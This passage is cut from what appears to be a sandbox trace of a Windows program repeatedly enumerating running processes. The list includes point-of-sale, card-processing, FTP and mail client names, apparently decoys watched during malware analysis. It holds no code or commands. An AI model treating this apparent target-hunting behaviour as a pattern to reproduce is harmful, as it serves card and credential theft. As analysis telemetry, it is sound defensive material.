th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0299.143] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0299.146] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0299.148] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0299.149] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0299.151] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0299.156] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0299.158] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0299.160] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0299.161] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0299.163] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0299.165] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="discussion.exe")) returned 1 [0299.216] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="styledesignbusiness.exe")) returned 1 [0299.218] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="new_door.exe")) returned 1 [0299.220] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bed fight.exe")) returned 1 [0299.222] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="federal hotel.exe")) returned 1 [0299.224] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0299.226] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0299.227] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0299.229] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0299.234] CloseHandle (hObject=0x227c) returned 1 [0299.234] Sleep (dwMilliseconds=0x64) [0299.346] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x227c [0299.362] Process32First (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0299.365] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x73, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0299.367] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0299.369] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0299.375] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0299.378] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0299.380] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0299.382] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0299.384] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0299.454] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0299.457] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0299.459] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0299.461] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x46, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0299.463] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0299.469] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0299.471] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0299.474] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0299.476] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0299.478] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0299.485] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0299.487] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0299.489] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0299.491] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0299.493] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2d, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0299.511] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0299.513] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0299.515] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0299.517] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0299.519] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0299.521] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0299.523] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0299.526] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0299.531] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0299.533] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="degree_sing_pretty.exe")) returned 1 [0299.535] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0299.538] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0299.540] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0299.542] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0299.547] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0299.549] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0299.551] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0299.553] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bag-begin-gas.exe")) returned 1 [0299.556] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0299.608] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0299.611] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0299.613] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazineofficialteach.exe")) returned 1 [0299.615] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0299.617] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious_free_generation.exe")) returned 1 [0299.624] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hair friend will.exe")) returned 1 [0299.626] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whose.exe")) returned 1 [0299.628] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0299.631] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0299.633] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0299.635] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0299.654] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0299.656] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0299.658] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0299.661] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0299.663] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0299.666] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0299.721] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0299.724] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0299.727] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0299.733] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0299.735] Process32Next (in: hSnapshot=0x227c, lppe=0x106efe20 | out: 